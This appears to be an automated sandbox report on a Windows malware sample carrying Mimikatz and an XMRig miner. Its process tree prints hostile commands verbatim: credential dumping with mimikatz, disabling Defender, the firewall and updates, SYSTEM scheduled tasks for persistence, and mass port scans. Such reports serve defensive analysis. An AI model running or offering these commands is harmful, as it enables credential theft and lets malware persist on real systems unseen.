Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
09-08-2024 07:47
General
-
Target
2024-08-09_5f67da39b77d6aaedccf9b23ae8b703a_hacktools_icedid_mimikatz.exe
-
Size
9.2MB
-
MD5
5f67da39b77d6aaedccf9b23ae8b703a
-
SHA1
a08c06c250f0dc9dffb11da53f2d5764683a927e
-
SHA256
f6087fb644043bae37b399692233efe06249c2512411f80085592d37265692b4
-
SHA512
55de0a91790ecedf1a06bc6d0ad620758d156470ee4bfd22e43a073aaa2c9eab54dac584818a0a71290c5e36d94f6478b57eceaf5420a6cd458a8a31593714aa
-
SSDEEP
196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1
Malware Config
Signatures
-
Disables service(s) 3 TTPs
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Contacts a large (30299) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
-
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
-
Drops file in Drivers directory 3 IoCs
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Executes dropped EXE 26 IoCs
-
Loads dropped DLL 12 IoCs
-
UPX packed file 34 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Network Share Discovery 1 TTPs
Attempt to gather information on host network.
-
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Drops file in Windows directory 60 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
NSIS installer 3 IoCs
-
Modifies data under HKEY_USERS 39 IoCs
-
Modifies registry class 14 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 15 IoCs
-
Suspicious behavior: RenamesItself 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 21 IoCs
-
Suspicious use of SetWindowsHookEx 12 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\TEMP\awlverzbi\nqrzsm.exe"C:\Windows\TEMP\awlverzbi\nqrzsm.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\2024-08-09_5f67da39b77d6aaedccf9b23ae8b703a_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-08-09_5f67da39b77d6aaedccf9b23ae8b703a_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\bekggbli\iuclszl.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\bekggbli\iuclszl.exeC:\Windows\bekggbli\iuclszl.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\bekggbli\iuclszl.exeC:\Windows\bekggbli\iuclszl.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\dvpvfgkqq\vefdcrtiv\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\dvpvfgkqq\vefdcrtiv\wpcap.exeC:\Windows\dvpvfgkqq\vefdcrtiv\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\dvpvfgkqq\vefdcrtiv\qeteblhlu.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\dvpvfgkqq\vefdcrtiv\Scant.txt2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\dvpvfgkqq\vefdcrtiv\qeteblhlu.exeC:\Windows\dvpvfgkqq\vefdcrtiv\qeteblhlu.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\dvpvfgkqq\vefdcrtiv\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\dvpvfgkqq\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\dvpvfgkqq\Corporate\log.txt2⤵
- Drops file in Windows directory
-
C:\Windows\dvpvfgkqq\Corporate\vfshost.exeC:\Windows\dvpvfgkqq\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "blssqdfbz" /ru system /tr "cmd /c C:\Windows\ime\iuclszl.exe"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "blssqdfbz" /ru system /tr "cmd /c C:\Windows\ime\iuclszl.exe"3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "declipgtc" /ru system /tr "cmd /c echo Y|cacls C:\Windows\bekggbli\iuclszl.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "declipgtc" /ru system /tr "cmd /c echo Y|cacls C:\Windows\bekggbli\iuclszl.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "imcesgivu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\awlverzbi\nqrzsm.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "imcesgivu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\awlverzbi\nqrzsm.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exeC:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 776 C:\Windows\TEMP\dvpvfgkqq\776.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exeC:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 316 C:\Windows\TEMP\dvpvfgkqq\316.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exeC:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 1916 C:\Windows\TEMP\dvpvfgkqq\1916.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exeC:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 2460 C:\Windows\TEMP\dvpvfgkqq\2460.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exeC:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 2784 C:\Windows\TEMP\dvpvfgkqq\2784.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exeC:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 388 C:\Windows\TEMP\dvpvfgkqq\388.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exeC:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 3152 C:\Windows\TEMP\dvpvfgkqq\3152.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exeC:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 3740 C:\Windows\TEMP\dvpvfgkqq\3740.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exeC:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 3832 C:\Windows\TEMP\dvpvfgkqq\3832.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exeC:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 3892 C:\Windows\TEMP\dvpvfgkqq\3892.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exeC:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 3976 C:\Windows\TEMP\dvpvfgkqq\3976.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exeC:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 2916 C:\Windows\TEMP\dvpvfgkqq\2916.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exeC:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 3964 C:\Windows\TEMP\dvpvfgkqq\3964.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exeC:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 4736 C:\Windows\TEMP\dvpvfgkqq\4736.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exeC:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 3324 C:\Windows\TEMP\dvpvfgkqq\3324.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\dvpvfgkqq\vefdcrtiv\scan.bat2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\dvpvfgkqq\vefdcrtiv\nvmribbga.exenvmribbga.exe TCP 194.110.0.1 194.110.255.255 445 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\zebhau.exeC:\Windows\SysWOW64\zebhau.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\iuclszl.exe1⤵
-
C:\Windows\ime\iuclszl.exeC:\Windows\ime\iuclszl.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\awlverzbi\nqrzsm.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\awlverzbi\nqrzsm.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\bekggbli\iuclszl.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\bekggbli\iuclszl.exe /p everyone:F2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\iuclszl.exe1⤵
-
C:\Windows\ime\iuclszl.exeC:\Windows\ime\iuclszl.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\awlverzbi\nqrzsm.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\awlverzbi\nqrzsm.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\bekggbli\iuclszl.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\bekggbli\iuclszl.exe /p everyone:F2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
Network
MITRE ATT&CK Enterprise v15
Execution
Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Discovery
Network Service Discovery
2Network Share Discovery
1Query Registry
1Remote System Discovery
1System Information Discovery
1System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
4.1MB
MD51c70e5e2cf5cf8e01d8d62c2212928a4
SHA11074058f5ca83bafc37d53625695b934e89372d3
SHA2569938aca9b86319d235326d4708b223ecb7b7d7d504235e441006c2e3e992f067
SHA5127027c4c712b427852a21b068d18317861b9d297d15263bc03411535ccc4e4c61cbfb4670520ffe4bdda170ccf11a06f793008ceeae7311334c9058d1f6881e41
-
Filesize
7.6MB
MD59a7304589c910aea69ec73c1539a7264
SHA1371548ebf6827948f251fcd15409cc7310b33efe
SHA2562c45df48326cc4d6a5d28615166c32b704adbf2455499a19e1393dad8fc00e6a
SHA5123456ea0acf63daa322d9bc283c6dc6f0a4080a79d499db115867602e55808187f709a8ccd65b155bc4252daa449e86e947693565e1dc82eabb7cca634525810c
-
Filesize
818KB
MD546dedd0b4bdc8eddcef08aba498277ef
SHA12b9b23d4647ee40f32f0936ecc36e5d06de7366b
SHA256a572642597b3c6f800c3a60ccffbcd9afea93106f597e0be2f5a71c8721a6bc2
SHA51276b5303bbea9d571d60449ad94c35d79231c7f54d7106cd270704af7acad54988429b70d0c6b51be50c4a7c0a46752c8637be7188374dc413b573e3233e8dc30
-
Filesize
25.9MB
